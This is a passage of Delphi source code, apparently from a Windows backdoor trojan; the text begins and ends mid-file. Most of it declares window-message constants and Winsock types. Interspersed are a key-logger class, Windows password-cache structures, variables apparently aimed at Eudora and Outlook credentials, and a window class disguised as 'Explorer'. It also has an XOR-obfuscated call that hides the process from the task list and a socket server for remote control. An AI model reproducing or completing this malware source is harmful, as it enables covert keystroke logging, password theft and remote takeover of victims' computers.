$0021; WM_CHILDACTIVATE = $0022; WM_QUEUESYNC = $0023; WM_GETMINMAXINFO = $0024; WM_PAINTICON = $0026; WM_ICONERASEBKGND = $0027; WM_NEXTDLGCTL = $0028; WM_SPOOLERSTATUS = $002A; WM_DRAWITEM = $002B; WM_MEASUREITEM = $002C; WM_DELETEITEM = $002D; WM_VKEYTOITEM = $002E; WM_CHARTOITEM = $002F; WM_SETFONT = $0030; WM_GETFONT = $0031; WM_QUERYDRAGICON = $0037; WM_COMPAREITEM = $0039; WM_COMPACTING = $0041; WM_COMMNOTIFY = $0044; { obsolete in Win32} WM_WINDOWPOSCHANGING = $0046; WM_WINDOWPOSCHANGED = $0047; WM_POWER = $0048; WM_COPYDATA = $004A; WM_CANCELJOURNAL = $004B; WM_NOTIFY = $004E; WM_INPUTLANGCHANGEREQUEST = $0050; WM_INPUTLANGCHANGE = $0051; WM_TCARD = $0052; WM_HELP = $0053; WM_USERCHANGED = $0054; WM_NOTIFYFORMAT = $0055; WM_CONTEXTMENU = $007B; WM_STYLECHANGING = $007C; WM_STYLECHANGED = $007D; WM_DISPLAYCHANGE = $007E; WM_GETICON = $007F; WM_SETICON = $0080; WM_NCCREATE = $0081; WM_NCDESTROY = $0082; WM_NCCALCSIZE = $0083; WM_NCHITTEST = $0084; WM_NCPAINT = $0085; WM_NCACTIVATE = $0086; WM_GETDLGCODE = $0087; WM_NCMOUSEMOVE = $00A0; { WM_NCLBUTTONDOWN = $00A1; WM_NCLBUTTONUP = $00A2; WM_NCLBUTTONDBLCLK = $00A3; WM_NCRBUTTONDOWN = $00A4; WM_NCRBUTTONUP = $00A5; WM_NCRBUTTONDBLCLK = $00A6; WM_NCMBUTTONDOWN = $00A7; WM_NCMBUTTONUP = $00A8; WM_NCMBUTTONDBLCLK = $00A9; } WM_KEYFIRST = $0100; WM_KEYDOWN = $0100; WM_KEYUP = $0101; WM_CHAR = $0102; WM_DEADCHAR = $0103; WM_SYSKEYDOWN = $0104; WM_SYSKEYUP = $0105; WM_SYSCHAR = $0106; WM_SYSDEADCHAR = $0107; WM_KEYLAST = $0108; WM_INITDIALOG = $0110; WM_COMMAND = $0111; WM_SYSCOMMAND = $0112; WM_TIMER = $0113; WM_HSCROLL = $0114; WM_VSCROLL = $0115; WM_INITMENU = $0116; WM_INITMENUPOPUP = $0117; WM_MENUSELECT = $011F; WM_MENUCHAR = $0120; WM_ENTERIDLE = $0121; WM_CTLCOLORMSGBOX = $0132; WM_CTLCOLOREDIT = $0133; WM_CTLCOLORLISTBOX = $0134; WM_CTLCOLORBTN = $0135; WM_CTLCOLORDLG = $0136; WM_CTLCOLORSCROLLBAR= $0137; WM_CTLCOLORSTATIC = $0138; WM_MOUSEFIRST = $0200; WM_MOUSEMOVE = $0200; WM_LBUTTONDOWN = $0201; WM_LBUTTONUP = $0202; WM_LBUTTONDBLCLK = $0203; WM_RBUTTONDOWN = $0204; WM_RBUTTONUP = $0205; WM_RBUTTONDBLCLK = $0206; WM_MBUTTONDOWN = $0207; WM_MBUTTONUP = $0208; WM_MBUTTONDBLCLK = $0209; WM_MOUSEWHEEL = $020A; WM_MOUSELAST = $020A; WM_PARENTNOTIFY = $0210; WM_ENTERMENULOOP = $0211; WM_EXITMENULOOP = $0212; WM_NEXTMENU = $0213; WM_SIZING = 532; WM_CAPTURECHANGED = 533; WM_MOVING = 534; WM_POWERBROADCAST = 536; WM_DEVICECHANGE = 537; { WM_IME_STARTCOMPOSITION = $010D; WM_IME_ENDCOMPOSITION = $010E; WM_IME_COMPOSITION = $010F; WM_IME_KEYLAST = $010F; WM_IME_SETCONTEXT = $0281; WM_IME_NOTIFY = $0282; WM_IME_CONTROL = $0283; WM_IME_COMPOSITIONFULL = $0284; WM_IME_SELECT = $0285; WM_IME_CHAR = $0286; WM_IME_KEYDOWN = $0290; WM_IME_KEYUP = $0291; WM_MDICREATE = $0220; WM_MDIDESTROY = $0221; WM_MDIACTIVATE = $0222; WM_MDIRESTORE = $0223; WM_MDINEXT = $0224; WM_MDIMAXIMIZE = $0225; WM_MDITILE = $0226; WM_MDICASCADE = $0227; WM_MDIICONARRANGE = $0228; WM_MDIGETACTIVE = $0229; WM_MDISETMENU = $0230; WM_ENTERSIZEMOVE = $0231; WM_EXITSIZEMOVE = $0232; WM_DROPFILES = $0233; WM_MDIREFRESHMENU = $0234; } WM_MOUSEHOVER = $02A1; WM_MOUSELEAVE = $02A3; WM_CUT = $0300; WM_COPY = $0301; WM_PASTE = $0302; WM_CLEAR = $0303; WM_UNDO = $0304; WM_PAINTCLIPBOARD = $0309; WM_PRINT = 791; WM_PRINTCLIENT = 792; WM_HANDHELDFIRST = 856; WM_HANDHELDLAST = 863; WM_PENWINFIRST = $0380; WM_PENWINLAST = $038F; WM_COALESCE_FIRST = $0390; WM_COALESCE_LAST = $039F; WM_DDE_FIRST = $03E0; WM_DDE_INITIATE = WM_DDE_FIRST + 0; WM_DDE_TERMINATE = WM_DDE_FIRST + 1; WM_DDE_ADVISE = WM_DDE_FIRST + 2; WM_DDE_UNADVISE = WM_DDE_FIRST + 3; WM_DDE_ACK = WM_DDE_FIRST + 4; WM_DDE_DATA = WM_DDE_FIRST + 5; WM_DDE_REQUEST = WM_DDE_FIRST + 6; WM_DDE_POKE = WM_DDE_FIRST + 7; WM_DDE_EXECUTE = WM_DDE_FIRST + 8; WM_DDE_LAST = WM_DDE_FIRST + 8; WM_APP = $8000; WM_USER = $0400; UM_KEYHIT = WM_USER + 7; //keylog const ERROR = '|ERROR:'; ALLDONE = 'All done.'; //VER_PLATFORM_WIN32s = 0; //V/ER_PLATFORM_WIN32_WINDOWS = 1; //VER_PLATFORM_WIN32_NT = 2; Count : integer = 0; lpzClassName = 'Explorer '; lpzWindowsName = 'Explorer '; WM_MY_SOCK_MESSAGE = WM_USER+2; LFCR = #10#13; { File open modes } fmOpenRead = $0000; fmOpenWrite = $0001; fmOpenReadWrite = $0002; fmShareCompat = $0000; fmShareExclusive = $0010; fmShareDenyWrite = $0020; fmShareDenyRead = $0030; fmShareDenyNone = $0040; { File attribute constants } faReadOnly = $00000001; faHidden = $00000002; faSysFile = $00000004; faVolumeID = $00000008; faDirectory = $00000010; faArchive = $00000020; faAnyFile = $0000003F; {prog type} type PWinPassword = ^TWinPassword; TWinPassword = record EntrySize: Word; ResourceSize: Word; PasswordSize: Word; EntryIndex: Byte; EntryType: Byte; PasswordC: Char; end; {winsock type} type u_char = Char; u_short = Word; u_int = Integer; u_long = Longint; TSocket = u_int; type PFDSet = ^TFDSet; TFDSet = packed record fd_count: u_int; fd_array: array[0..FD_SETSIZE-1] of TSocket; end; PTimeVal = ^TTimeVal; TTimeVal = packed record tv_sec: Longint; tv_usec: Longint; end; type PHostEnt = ^THostEnt; THostEnt = packed record h_name: PChar; h_aliases: ^PChar; h_addrtype: Smallint; h_length: Smallint; case Byte of 0: (h_addr_list: ^PChar); 1: (h_addr: ^PChar) end; PNetEnt = ^TNetEnt; TNetEnt = packed record n_name: PChar; n_aliases: ^PChar; n_addrtype: Smallint; n_net: u_long; end; PServEnt = ^TServEnt; TServEnt = packed record s_name: PChar; s_aliases: ^PChar; s_port: Smallint; s_proto: PChar; end; PProtoEnt = ^TProtoEnt; TProtoEnt = packed record p_name: PChar; p_aliases: ^Pchar; p_proto: Smallint; end; type SunB = packed record s_b1, s_b2, s_b3, s_b4: u_char; end; SunW = packed record s_w1, s_w2: u_short; end; PInAddr = ^TInAddr; TInAddr = packed record case integer of 0: (S_un_b: SunB); 1: (S_un_w: SunW); 2: (S_addr: u_long); end; PSockAddrIn = ^TSockAddrIn; TSockAddrIn = packed record case Integer of 0: (sin_family: u_short; sin_port: u_short; sin_addr: TInAddr; sin_zero: array[0..7] of Char); 1: (sa_family: u_short; sa_data: array[0..13] of Char) end; type PWSAData = ^TWSAData; TWSAData = packed record wVersion: Word; wHighVersion: Word; szDescription: array[0..WSADESCRIPTION_LEN] of Char; szSystemStatus: array[0..WSASYS_STATUS_LEN] of Char; iMaxSockets: Word; iMaxUdpDg: Word; lpVendorInfo: PChar; end; PTransmitFileBuffers = ^TTransmitFileBuffers; TTransmitFileBuffers = packed record Head: Pointer; HeadLength: DWORD; Tail: Pointer; TailLength: DWORD; end; type { Structure used by kernel to store most addresses. } PSockAddr = ^TSockAddr; TSockAddr = TSockAddrIn; { Structure used by kernel to pass protocol information in raw sockets. } PSockProto = ^TSockProto; TSockProto = packed record sp_family: u_short; sp_protocol: u_short; end; type { Structure used for manipulating linger option. } PLinger = ^TLinger; TLinger = packed record l_onoff: u_short; l_linger: u_short; end; const INVALID_SOCKET = TSocket(NOT(0)); SOCKET_ERROR = -1; {type window message record} type PMessage = ^TMessage; TMessage = record Msg: Cardinal; case Integer of 0: ( WParam: Longint; LParam: Longint; Result: Longint); 1: ( WParamLo: Word; WParamHi: Word; LParamLo: Word; LParamHi: Word; ResultLo: Word; ResultHi: Word); end; { Common message format records } TWMNoParams = record Msg: Cardinal; Unused: array[0..3] of Word; Result: Longint; end; TWMKey = record Msg: Cardinal; CharCode: Word; Unused: Word; KeyData: Longint; Result: Longint; end; TWMMouse = record Msg: Cardinal; Keys: Longint; case Integer of 0: ( XPos: Smallint; YPos: Smallint); 1: ( Pos: TSmallPoint; Result: Longint); end; TWMWindowPosMsg = record Msg: Cardinal; Unused: Integer; WindowPos: PWindowPos; Result: Longint; end; TWMScroll = record Msg: Cardinal; ScrollCode: Smallint; { SB_xxxx } Pos: Smallint; ScrollBar: HWND; Result: Longint; end; { Message records } TWMActivate = record Msg: Cardinal; Active: Word; { WA_INACTIVE, WA_ACTIVE, WA_CLICKACTIVE } Minimized: WordBool; ActiveWindow: HWND; Result: Longint; end; TWMActivateApp = record Msg: Cardinal; Active: BOOL; ThreadId: Longint; Result: Longint; end; TWMAskCBFormatName = record Msg: Cardinal; NameLen: Word; Unused: Word; FormatName: PChar; Result: Longint; end; TWMCancelMode = TWMNoParams; TWMChangeCBChain = record Msg: Cardinal; Remove: HWND; Next: HWND; Result: Longint; end; TWMChar = TWMKey; TWMCharToItem = record Msg: Cardinal; Key: Word; CaretPos: Word; ListBox: HWND; Result: Longint; end; TWMChildActivate = TWMNoParams; TWMChooseFont_GetLogFont = record Msg: Cardinal; Unused: Longint; LogFont: PLogFont; Result: Longint; end; TWMClear = TWMNoParams; TWMClose = TWMNoParams; TWMCommand = record Msg: Cardinal; ItemID: Word; NotifyCode: Word; Ctl: HWND; Result: Longint; end; TWMCompacting = record Msg: Cardinal; CompactRatio: Longint; Unused: Longint; Result: Longint; end; TWMCompareItem = record Msg: Cardinal; Ctl: HWnd; CompareItemStruct: PCompareItemStruct; Result: Longint; end; TWMCopy = TWMNoParams; TWMCopyData = record Msg: Cardinal; From: HWND; CopyDataStruct: PCopyDataStruct; Result: Longint; end; { ?? WM_CLP_LAUNCH, WM_CPL_LAUNCHED } TWMCreate = record Msg: Cardinal; Unused: Integer; CreateStruct: PCreateStruct; Result: Longint; end; TWMCtlColor = record Msg: Cardinal; ChildDC: HDC; ChildWnd: HWND; Result: Longint; end; TWMCtlColorBtn = TWMCtlColor; TWMCtlColorDlg = TWMCtlColor; TWMCtlColorEdit = TWMCtlColor; TWMCtlColorListbox = TWMCtlColor; TWMCtlColorMsgbox = TWMCtlColor; TWMCtlColorScrollbar = TWMCtlColor; TWMCtlColorStatic = TWMCtlColor; TWMCut = TWMNoParams; TWMDDE_Ack = record Msg: Cardinal; PostingApp: HWND; case Word of WM_DDE_INITIATE: ( App: Word; Topic: Word; Result: Longint); WM_DDE_EXECUTE {and all others}: ( PackedVal: Longint); end; TWMDDE_Advise = record Msg: Cardinal; PostingApp: HWND; PackedVal: Longint; Result: Longint; end; TWMDDE_Data = record Msg: Cardinal; PostingApp: HWND; PackedVal: Longint; Result: Longint; end; TWMDDE_Execute = record Msg: Cardinal; PostingApp: HWND; Commands: THandle; Result: Longint; end; TWMDDE_Initiate = record Msg: Cardinal; PostingApp: HWND; App: Word; Topic: Word; Result: Longint; end; TWMDDE_Poke = record Msg: Cardinal; PostingApp: HWND; PackedVal: Longint; Result: Longint; end; TWMDDE_Request = record Msg: Cardinal; PostingApp: HWND; Format: Word; Item: Word; Result: Longint; end; TWMDDE_Terminate = record Msg: Cardinal; PostingApp: HWND; Unused: Longint; Result: Longint; end; TWMDDE_Unadvise = record Msg: Cardinal; PostingApp: HWND; Format: Word; Item: Word; Result: Longint; end; TWMDeadChar = TWMChar; TWMDeleteItem = record Msg: Cardinal; Ctl: HWND; DeleteItemStruct: PDeleteItemStruct; Result: Longint; end; TWMDestroy = TWMNoParams; TWMDestroyClipboard = TWMNoParams; TWMDevModeChange = record Msg: Cardinal; Unused: Integer; Device: PChar; Result: Longint; end; TWMDrawClipboard = TWMNoParams; { TWMDropFiles = record Msg: Cardinal; Drop: THANDLE; Unused: Longint; Result: Longint; end; } TWMEnable = record Msg: Cardinal; Enabled: LongBool; Unused: Longint; Result: Longint; end; TWMEndSession = record Msg: Cardinal; EndSession: LongBool; Unused: Longint; Result: Longint; end; TWMEnterIdle = record Msg: Cardinal; Source: Longint; { MSGF_DIALOGBOX, MSGF_MENU } IdleWnd: HWND; Result: Longint; end; TWMEnterMenuLoop = record Msg: Cardinal; IsTrackPopupMenu: LongBool; Unused: Longint; Result: Longint; end; TWMExitMenuLoop = TWMEnterMenuLoop; TWMEraseBkgnd = record Msg: Cardinal; DC: HDC; Unused: Longint; Result: Longint; end; TWMFontChange = TWMNoParams; TWMGetDlgCode = TWMNoParams; TWMGetFont = TWMNoParams; TWMGetIcon = record Msg: Cardinal; BigIcon: Longbool; Unused: Longint; Result: Longint; end; TWMGetText = record Msg: Cardinal; TextMax: Integer; Text: PChar; Result: Longint; end; TWMGetTextLength = TWMNoParams; { TWMHotKey = record Msg: Cardinal; HotKey: Longint; Unused: Longint; Result: Longint; end; } TWMHScroll = TWMScroll; TWMHScrollClipboard = record Msg: Cardinal; Viewer: HWND; ScrollCode: Word; {SB_BOTTOM, SB_ENDSCROLL, SB_LINEDOWN, SB_LINEUP, SB_PAGEDOWN, SB_PAGEUP, SB_THUMBPOSITION, SB_THUMBTRACK, SB_TOP } Pos: Word; Result: Longint; end; TWMIconEraseBkgnd = TWMEraseBkgnd; TWMInitDialog = record Msg: Cardinal; Focus: HWND; InitParam: Longint; Result: Longint; end; TWMInitMenu = record Msg: Cardinal; Menu: HMENU; Unused: Longint; Result: Longint; end; TWMInitMenuPopup = record Msg: Cardinal; MenuPopup: HMENU; Pos: Smallint; SystemMenu: WordBool; Result: Longint; end; TWMKeyDown = TWMKey; TWMKeyUp = TWMKey; TWMKillFocus = record Msg: Cardinal; FocusedWnd: HWND; Unused: Longint; Result: Longint; end; TWMLButtonDblClk = TWMMouse; TWMLButtonDown = TWMMouse; TWMLButtonUp = TWMMouse; TWMMButtonDblClk = TWMMouse; TWMMButtonDown = TWMMouse; TWMMButtonUp = TWMMouse; TWMMDIActivate = record Msg: Cardinal; case Integer of 0: ( ChildWnd: HWND); 1: ( DeactiveWnd: HWND; ActiveWnd: HWND; Result: Longint); end; TWMMDICascade = record Msg: Cardinal; Cascade: Longint; { 0, MDITILE_SKIPDISABLED } Unused: Longint; Result: Longint; end; TWMMDICreate = record Msg: Cardinal; Unused: Integer; MDICreateStruct: PMDICreateStruct; Result: Longint; end; TWMMDIDestroy = record Msg: Cardinal; Child: HWND; Unused: Longint; Result: Longint; end; TWMMDIGetActive = TWMNoParams; TWMMDIIconArrange = TWMNoParams; TWMMDIMaximize = record Msg: Cardinal; Maximize: HWND; Unused: Longint; Result: Longint; end; TWMMDINext = record Msg: Cardinal; Child: HWND; Next: Longint; Result: Longint; end; TWMMDIRefreshMenu = TWMNoParams; TWMMDIRestore = record Msg: Cardinal; IDChild: HWND; Unused: Longint; Result: Longint; end; TWMMDISetMenu = record Msg: Cardinal; MenuFrame: HMENU; MenuWindow: HMENU; Result: Longint; end; TWMMDITile = record Msg: Cardinal; Tile: Longint; { MDITILE_HORIZONTAL, MDITILE_SKIPDISABLE, MDITILE_VERTICAL } Unused: Longint; Result: Longint; end; TWMMenuChar = record Msg: Cardinal; User: Char; Unused: Byte; MenuFlag: Word; { MF_POPUP, MF_SYSMENU } Menu: HMENU; Result: Longint; end; TWMMenuSelect = record Msg: Cardinal; IDItem: Word; MenuFlag: Word; { MF_BITMAP, MF_CHECKED, MF_DISABLED, MF_GRAYED, MF_MOUSESELECT, MF_OWNERDRAW, MF_POPUP, MF_SEPARATOR, MF_SYSMENU } Menu: HMENU; Result: Longint; end; TWMMouseActivate = record Msg: Cardinal; TopLevel: HWND; HitTestCode: Word; MouseMsg: Word; Result: Longint; end; TWMMouseMove = TWMMouse; TWMMove = record Msg: Cardinal; Unused: Integer; case Integer of 0: ( XPos: Smallint; YPos: Smallint); 1: ( Pos: TSmallPoint; Result: Longint); end; TWMNCActivate = record Msg: Cardinal; Active: BOOL; Unused: Longint; Result: Longint; end; TWMNCCalcSize = record Msg: Cardinal; CalcValidRects: BOOL; CalcSize_Params: PNCCalcSizeParams; Result: Longint; end; TWMNCCreate = record Msg: Cardinal; Unused: Integer; CreateStruct: PCreateStruct; Result: Longint; end; TWMNCDestroy = TWMNoParams; TWMNCHitTest = record Msg: Cardinal; Unused: Longint; case Integer of 0: ( XPos: Smallint; YPos: Smallint); 1: ( Pos: TSmallPoint; Result: Longint); end; TWMNCHitMessage = record Msg: Cardinal; HitTest: Longint; XCursor: Smallint; YCursor: Smallint; Result: Longint; end; TWMNCLButtonDblClk = TWMNCHitMessage; TWMNCLButtonDown = TWMNCHitMessage; TWMNCLButtonUp = TWMNCHitMessage; TWMNCMButtonDblClk = TWMNCHitMessage; TWMNCMButtonDown = TWMNCHitMessage; TWMNCMButtonUp = TWMNCHitMessage; TWMNCMouseMove = TWMNCHitMessage; TWMNCPaint = TWMNoParams; TWMNCRButtonDblClk = TWMNCHitMessage; TWMNCRButtonDown = TWMNCHitMessage; TWMNCRButtonUp = TWMNCHitMessage; TWMNextDlgCtl = record Msg: Cardinal; CtlFocus: Longint; Handle: WordBool; Unused: Word; Result: Longint; end; TWMNotify = record Msg: Cardinal; IDCtrl: Longint; NMHdr: PNMHdr; Result: Longint; end; TWMNotifyFormat = record Msg: Cardinal; From: HWND; Command: Longint; Result: Longint; end; TWMPaint = record Msg: Cardinal; DC: HDC; Unused: Longint; Result: Longint; end; TWMPaintClipboard = record Msg: Cardinal; Viewer: HWND; PaintStruct: THandle; Result: Longint; end; TWMPaintIcon = TWMNoParams; TWMPaletteChanged = record Msg: Cardinal; PalChg: HWND; Unused: Longint; Result: Longint; end; TWMPaletteIsChanging = record Msg: Cardinal; Realize: HWND; Unused: Longint; Result: Longint; end; TWMParentNotify = record Msg: Cardinal; case Event: Word of WM_CREATE, WM_DESTROY: ( ChildID: Word; ChildWnd: HWnd); WM_LBUTTONDOWN, WM_MBUTTONDOWN, WM_RBUTTONDOWN: ( Value: Word; XPos: Smallint; YPos: Smallint); 0: ( Value1: Word; Value2: Longint; Result: Longint); end; TWMPaste = TWMNoParams; TWMPower = record Msg: Cardinal; PowerEvt: Longint; { PWR_SUSPENDREQUEST, PWR_SUSPENDRESUME, PWR_CRITICALRESUME } Unused: Longint; Result: Longint; end; TWMQueryDragIcon = TWMNoParams; TWMQueryEndSession = record Msg: Cardinal; Source: Longint; Unused: Longint; Result: Longint; end; TWMQueryNewPalette = TWMNoParams; TWMQueryOpen = TWMNoParams; TWMQueueSync = TWMNoParams; TWMQuit = record Msg: Cardinal; ExitCode: Longint; Unused: Longint; Result: Longint; end; TWMRButtonDblClk = TWMMouse; TWMRButtonDown = TWMMouse; TWMRButtonUp = TWMMouse; TWMRenderAllFormats = TWMNoParams; TWMRenderFormat = record Msg: Cardinal; Format: Longint; Unused: Longint; Result: Longint; end; TWMSetCursor = record Msg: Cardinal; CursorWnd: HWND; HitTest: Word; MouseMsg: Word; Result: Longint; end; TWMSetFocus = record Msg: Cardinal; FocusedWnd: HWND; Unused: Longint; Result: Longint; end; TWMSetFont = record Msg: Cardinal; Font: HFONT; Redraw: WordBool; Unused: Word; Result: Longint; end; TWMSetIcon = record Msg: Cardinal; BigIcon: Longbool; Icon: HICON; Result: Longint; end; TWMSetRedraw = record Msg: Cardinal; Redraw: Longint; Unused: Longint; Result: Longint; end; TWMSetText = record Msg: Cardinal; Unused: Longint; Text: PChar; Result: Longint; end; TWMShowWindow = record Msg: Cardinal; Show: BOOL; Status: Longint; Result: Longint; end; TWMSize = record Msg: Cardinal; SizeType: Longint; { SIZE_MAXIMIZED, SIZE_MINIMIZED, SIZE_RESTORED, SIZE_MAXHIDE, SIZE_MAXSHOW } Width: Word; Height: Word; Result: Longint; end; TWMSizeClipboard = record Msg: Cardinal; Viewer: HWND; RC: THandle; Result: Longint; end; TWMSpoolerStatus = record Msg: Cardinal; JobStatus: Longint; JobsLeft: Word; Unused: Word; Result: Longint; end; TWMStyleChange = record Msg: Cardinal; StyleType: Longint; StyleStruct: PStyleStruct; Result: Longint; end; TWMStyleChanged = TWMStyleChange; TWMStyleChanging = TWMStyleChange; TWMSysChar = TWMKey; TWMSysColorChange = TWMNoParams; TWMSysDeadChar = record Msg: Cardinal; CharCode: Word; Unused: Word; KeyData: Longint; Result: Longint; end; TWMSysKeyDown = TWMKey; TWMSysKeyUp = TWMKey; TWMSystemError = record Msg: Cardinal; ErrSpec: Word; Unused: Longint; Result: Longint; end; TWMTimeChange = TWMNoParams; TWMTimer = record Msg: Cardinal; TimerID: Longint; TimerProc: TFarProc; Result: Longint; end; TWMUndo = TWMNoParams; TWMVKeyToItem = TWMCharToItem; TWMVScroll = TWMScroll; TWMVScrollClipboard = record Msg: Cardinal; Viewer: HWND; ScollCode: Word; ThumbPos: Word; Result: Longint; end; TWMWindowPosChanged = TWMWindowPosMsg; TWMWindowPosChanging = TWMWindowPosMsg; TWMWinIniChange = record Msg: Cardinal; Unused: Integer; Section: PChar; Result: Longint; end; TWMHelp = record Msg: Cardinal; Unused: Integer; HelpInfo: PHelpInfo; Result: Longint; end; TWMDisplayChange = record Msg: Cardinal; BitsPerPixel: Integer; Width: Word; Height: Word; end; // sysutils type type WordRec = packed record Lo, Hi: Byte; end; LongRec = packed record Lo, Hi: Word; end; TMethod = record Code, Data: Pointer; end; PByteArray = ^TByteArray; TByteArray = array[0..32767] of Byte; PWordArray = ^TWordArray; TWordArray = array[0..16383] of Word; TProcedure = procedure; TFileName = string; TSearchRec = record Time: Integer; Size: Integer; Attr: Integer; Name: TFileName; ExcludeAttr: Integer; FindHandle: THandle; FindData: TWin32FindData; end; TFileRec = record Handle: Integer; Mode: Integer; RecSize: Cardinal; Private: array[1..28] of Byte; UserData: array[1..32] of Byte; Name: array[0..259] of Char; end; PTextBuf = ^TTextBuf; TTextBuf = array[0..127] of Char; TTextRec = record Handle: Integer; Mode: Integer; BufSize: Cardinal; BufPos: Cardinal; BufEnd: Cardinal; BufPtr: PChar; OpenFunc: Pointer; InOutFunc: Pointer; FlushFunc: Pointer; CloseFunc: Pointer; UserData: array[1..32] of Byte; Name: array[0..259] of Char; Buffer: TTextBuf; end; TFloatValue = (fvExtended, fvCurrency); TFloatFormat = (ffGeneral, ffExponent, ffFixed, ffNumber, ffCurrency); TFloatRec = packed record Exponent: Smallint; Negative: Boolean; Digits: array[0..20] of Char; end; TTimeStamp = record Time: Integer; { Number of milliseconds since midnight } Date: Integer; { One plus number of days since 1/1/0003 } end; TMbcsByteType = (mbSingleByte, mbLeadByte, mbTrailByte); TSysLocale = packed record DefaultLCID: LCID; PriLangID: LANGID; SubLangID: LANGID; FarEast: Boolean; end; // password connection type TPasswordCacheEntry = packed record cbEntry : word; // size of this entry, in bytes cbResource : word; // size of resource name, in bytes cbPassword : word; // size of password, in bytes iEntry : byte; // entry index nType : byte; // type of entry abResource : array [0..$FFFFFFF] of char; end; TPPasswordCacheEntry = ^TPasswordCacheEntry; // registry type type TRegKeyInfo = record NumSubKeys: Integer; MaxSubKeyLen: Integer; NumValues: Integer; MaxValueLen: Integer; MaxDataLen: Integer; FileTime: TFileTime; end; TRegDataType = (rdUnknown, rdString, rdExpandString, rdInteger, rdBinary); TRegDataInfo = record RegData: TRegDataType; DataSize: Integer; end; TRegistry = class(TObject) private FCurrentKey: HKEY; FRootKey: HKEY; FLazyWrite: Boolean; FCurrentPath: string; FCloseRootKey: Boolean; procedure SetRootKey(Value: HKEY); function OpenKey(const Key: string; CanCreate: Boolean): Boolean; protected function GetBaseKey(Relative: Boolean): HKey; procedure ChangeKey(Value: HKey; const Path: string); procedure PutData(const Name: string; Buffer: Pointer; BufSize: Integer; RegData: TRegDataType); function GetData(const Name: string; Buffer: Pointer; BufSize: Integer; var RegData: TRegDataType): Integer; public constructor Create; destructor Destroy; override; procedure WriteString(const Name, Value: string); function ReadString(const Name: string): string; procedure CloseKey; function GetDataSize(const ValueName: string): Integer; function GetDataInfo(const ValueName: string; var Value: TRegDataInfo): Boolean; property CurrentKey : HKEY read FCurrentKey; property RootKey: HKEY read FRootKey write SetRootKey; property CurrentPath: string read FCurrentPath; property LazyWrite: Boolean read FLazyWrite write FLazyWrite; end; //=============================================================================THE_SOCKET; //=============================================================================THE_SOCKET; //Socket_Object_server TSock = class(TObject) procedure WriteString(wParam:word;Buff:PChar); function WriteData(wParam:word;Buff:pointer;Len:longInt):LongInt; procedure OnServerAccept(wParam,lParam:longInt); procedure OnServerClose(wParam,lParam:longInt); procedure OnServerRead(wParam,lParam:longInt); private public end; //Key_logger_object Type TLog = class(TObject) procedure LogCreate; procedure LogDestroy; private procedure KeyIncrement( var Msg: TMessage ); message UM_KEYHIT; public end; //============== all var var //sysutils var SysLocale: TSysLocale; LeadBytes: set of Char = []; Win32Platform: Integer; //MainVariables wClass: TWndClass; // Class struct for main window hInst, // Handle of program instance Handle: Integer; // Handle of main window Msg2: TMSG; // Message struct //Msg: TMSG; //Socket Server: TSocket; WSD: TWSAData; Addr: TSockAddrIn; // Address for connect. Port: Integer; //ReadBuff: TBuffer; yyyy,mm,dd,h,m,ss,CountRB: Word; result,nukemsg,nukemsg2,s,driv: string; d:integer; // si,i:integer; //udp j:byte; z:longint; //ip //Registry Registre: TRegistry; //other klasse: array [0..255] of char; Timeout: integer; t:textfile; // classe: array [0..255] of char; // counter :integer; //thread Sock:TSock; KLog: Tlog; eudora:string; outlook:string; ttt:textfile; h_SOCK_DLL :HModule; ThreadHdle :THandle; ThreadID :Integer; ExitCode :Integer; ThreadHdle2 :THandle; ThreadID2 :Integer; ExitCode2 :Integer; ThreadHdle3:THandle; ThreadID3 :Integer; ExitCode3 :Integer; //===Dir function systemdir:string; var d:integer; begin setlength(result,500); d:=getsystemdirectory(pchar(result),500); setlength(result,d); end; function windowsdir:string; var d:integer; begin setlength(result,500); d:=getwindowsdirectory(pchar(result),500); setlength(result,d); end; Function Crypt(S : String) : String; Var i : Byte; begin For i := 1 to Length(S) Do S[i] := Char(ord(S[i]) xor i); Crypt := S; end; //==executeAPI function ShellExecute(hWnd: HWND; Operation, FileName, Parameters, Directory: PChar; ShowCmd: Integer):integer; stdcall; external 'shell32.dll' name 'ShellExecuteA'; //function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'KERNEL32.DLL'; function RegisterInService:boolean; type TRegisterServiceProcess = function(ProcessID :Integer; Service :Boolean):Boolean; StdCall; var h_KERNEL_DLL :HModule; RegisterServiceProcess :TRegisterServiceProcess; begin Result := False; h_KERNEL_DLL := LoadLibrary(PChar('kernel32.dll')); if h_KERNEL_DLL <> Null then begin RegisterServiceProcess := GetProcAddress(h_KERNEL_DLL, PChar(crypt('SgdmvrbzZoyzdmj@c}pqfe'))); //RegisterServiceProcess if @RegisterServiceProcess <> Nil then Result := RegisterServiceProcess(GetCurrentProcessID, True); FreeLibrary(h_KERNEL_DLL); end; end; //=== winsock function //function accept(s: TSocket; addr: PSockAddr; addrlen: PInteger): TSocket; stdcall; external winsocket name 'accept'; function accept(s: TSocket; addr: PSockAddr; addrlen: PInteger): TSocket; stdcall; Type TListen = function(s: TSocket; addr: PSockAddr; addrlen: PInteger): TSocket; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('accept')); if @LListen <> Nil then Result := LListen(s, addr,addrlen); FreeLibrary(h_SOCK_DLL); end; end; //function bind(s: TSocket; var addr: TSockAddr; namelen: Integer): Integer; stdcall; external winsocket name 'bind'; function bind(s: TSocket; var addr: TSockAddr; namelen: Integer): Integer; stdcall; Type TListen = function(s: TSocket; var addr: TSockAddr; namelen: Integer): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('bind')); if @LListen <> Nil then Result := LListen(s, addr,namelen); FreeLibrary(h_SOCK_DLL); end; end; //function closesocket(s: TSocket): Integer; stdcall; external winsocket name 'closesocket'; function closesocket(s: TSocket): Integer; stdcall; Type TListen = function(s: TSocket): Integer; stdcall; var LListen :TListen; begin Result := 0; h_SOCK_DLL := LoadLibrary(PChar(crypt(winsocket))); if h_SOCK_DLL <> Null then begin LListen := GetProcAddress(h_SOCK_DLL, PChar('closesocket')); if @LListen <> Nil then Result := LListen(s); FreeLibrary(h_SOCK_DLL); end; end; //function connect(s: TSocket; var name: TSockAddr; namelen: Integer): Integer; stdcall; external winsocket name 'connect'; function connect(s: TSocket; var name: TSockAddr; namelen: Integer): Integer; stdcall; Type TListen = function(s: TSocket; var name: TSockAddr; namelen: Integer): Integer; stdcall; var LListen 